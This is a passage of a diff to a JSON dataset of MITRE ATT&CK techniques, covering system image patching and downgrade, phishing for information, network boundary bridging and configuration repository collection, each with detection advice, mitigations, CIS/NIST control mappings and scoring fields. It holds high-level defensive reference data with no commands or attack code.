Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ",
+        "url": "https://attack.mitre.org/techniques/T1601/001",
         "tactics": [
-            "Reconnaissance"
+            "Defense Evasion"
         ],
-        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)",
         "platforms": [
-            "PRE"
+            "Network"
         ],
-        "data_sources": [],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "data_sources": [
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1601",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1597.001",
-                "name": "Search Closed Sources: Threat Intel Vendors",
-                "url": "https://attack.mitre.org/techniques/T1597/001",
-                "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
             },
             {
-                "tid": "T1597.002",
-                "name": "Search Closed Sources: Purchase Technical Data",
-                "url": "https://attack.mitre.org/techniques/T1597/002",
-                "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
             {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
+        "cumulative_score": 0.41190476190476194,
+        "adjusted_score": 0.41190476190476194,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "3.6",
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8",
+            "12.2"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-5",
+            "IA-7",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
         "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1598",
-        "name": "Phishing for Information",
-        "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
-        "url": "https://attack.mitre.org/techniques/T1598",
+        "tid": "T1601.002",
+        "name": "Modify System Image: Downgrade System Image",
+        "description": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  ",
+        "url": "https://attack.mitre.org/techniques/T1601/002",
         "tactics": [
-            "Reconnaissance"
+            "Defense Evasion"
         ],
-        "detection": "Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\n\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).",
+        "detection": "Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ",
         "platforms": [
-            "PRE"
+            "Network"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "File: File Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1598.001",
-                "name": "Phishing for Information: Spearphishing Service",
-                "url": "https://attack.mitre.org/techniques/T1598/001",
-                "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
-                "detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1601",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1598.002",
-                "name": "Phishing for Information: Spearphishing Attachment",
-                "url": "https://attack.mitre.org/techniques/T1598/002",
-                "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
-                "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)",
-                "mitigations": [
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
             },
             {
-                "tid": "T1598.003",
-                "name": "Phishing for Information: Spearphishing Link",
-                "url": "https://attack.mitre.org/techniques/T1598/003",
-                "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
-                "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.",
-                "mitigations": [
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
             {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
             },
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.18333333333333335,
-        "adjusted_score": 0.18333333333333335,
+        "cumulative_score": 0.41190476190476194,
+        "adjusted_score": 0.41190476190476194,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "14.1",
-            "14.2",
-            "14.6"
+            "3.6",
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8",
+            "12.2"
         ],
         "nist_controls": [
+            "AC-2",
+            "AC-3",
             "AC-4",
-            "CA-7",
+            "AC-5",
+            "AC-6",
+            "CA-8",
             "CM-2",
+            "CM-3",
+            "CM-5",
             "CM-6",
-            "IA-9",
-            "SC-20",
-            "SC-44",
-            "SC-7",
-            "SI-3",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-5",
+            "IA-7",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
             "SI-4",
-            "SI-8"
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
         ],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.13333333333333333,
-            "mitigation_score": 0.2545454545454545
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1599",
-        "name": "Network Boundary Bridging",
-        "description": "Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
-        "url": "https://attack.mitre.org/techniques/T1599",
+        "tid": "T1602",
+        "name": "Data from Configuration Repository",
+        "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)",
+        "url": "https://attack.mitre.org/techniques/T1602",
         "tactics": [
-            "Defense Evasion"
+            "Collection"
         ],
-        "detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\n\nMonitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.",
+        "detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)",
         "platforms": [
             "Network"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1599.001",
-                "name": "Network Boundary Bridging: Network Address Translation Traversal",
-                "url": "https://attack.mitre.org/techniques/T1599/001",
-                "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities",
-                "detection": "Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.",
+                "tid": "T1602.001",
+                "name": "Data from Configuration Repository: SNMP (MIB Dump)",
+                "url": "https://attack.mitre.org/techniques/T1602/001",
+                "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ",
+                "detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)",
                 "mitigations": [
                     {
-                        "mid": "M1043",
-                        "name": "Credential Access Protection",
-                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
-                        "url": "https://attack.mitre.org/mitigations/M1043"
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
                     },
                     {
                         "mid": "M1037",
@@ -20100,32 +43275,83 @@
                         "url": "https://attack.mitre.org/mitigations/M1037"
                     },
                     {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
                     },
                     {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1602.002",
+                "name": "Data from Configuration Repository: Network Device Configuration Dump",
+                "url": "https://attack.mitre.org/techniques/T1602/002",
+                "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ",
+                "detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1043",
-                "name": "Credential Access Protection",
-                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
-                "url": "https://attack.mitre.org/mitigations/M1043"
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
                 "mid": "M1037",
